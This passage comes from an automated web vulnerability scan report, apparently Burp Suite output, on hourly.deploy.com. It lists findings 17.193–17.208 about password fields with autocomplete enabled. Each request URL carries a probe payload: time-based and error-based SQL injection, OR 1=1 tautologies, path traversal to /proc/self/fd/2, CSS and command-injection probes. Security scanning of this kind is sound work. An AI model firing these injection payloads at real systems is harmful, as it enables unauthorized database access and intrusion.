<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.193. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.194. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.195. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.196. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.197. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.198. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+OR+1%3d1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.199. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.200. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.201. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.202. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.203. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.204. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+OR+17-7%3d10

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.205. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.206. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.207. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=index.cfm

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.208. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
